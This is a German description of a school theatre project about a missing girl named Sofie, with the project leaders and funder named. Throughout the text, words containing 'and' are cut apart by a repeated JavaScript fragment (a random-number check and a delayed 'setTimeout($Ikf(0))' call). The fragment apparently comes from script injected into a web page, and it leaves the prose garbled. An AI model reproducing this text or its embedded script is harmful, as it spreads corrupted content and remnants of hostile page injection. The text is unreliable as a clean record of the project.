Wo ist Sofie? Diese Frage beschäftigt eine Gruppe Jugendlicher, die mitten in der Uckermark gestrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andet sind. Eigentlich um Geburtstag zu feiern. Sofies Geburtstag. Aber alles kommt andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders: das Warten auf Sofie bringt die Klassenkameraden in Konflikt. Als schließlich noch Luca auftaucht, der schon länger verschwunden war – droht die Situation zu eskalieren.

In dem Projekt „ich sehe Dich, wenn Du mich siehst“ haben sich die 25 SchülerInnen der Klasse 9.2. mit der Frage beschäftigt: was geschieht, wenn einer von uns plötzlich verschwindet? Was ist es, das man eigentlich hätte sagen, teilen, gemeinsam erleben wollen? Und: Welche Gründe können zu einem Bruch mit allem führen? Diese Überlegungen waren persönlicher Ausgangspunkt für das Finden von Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlungsalternativen im Alltag und das Hinterfragen des Umgangs miteinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander.

Projektleitung: Ana-Svenja Stamm und Stefanie López

Das Projekt wird gefördert von der Theresia Zandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander Stiftung.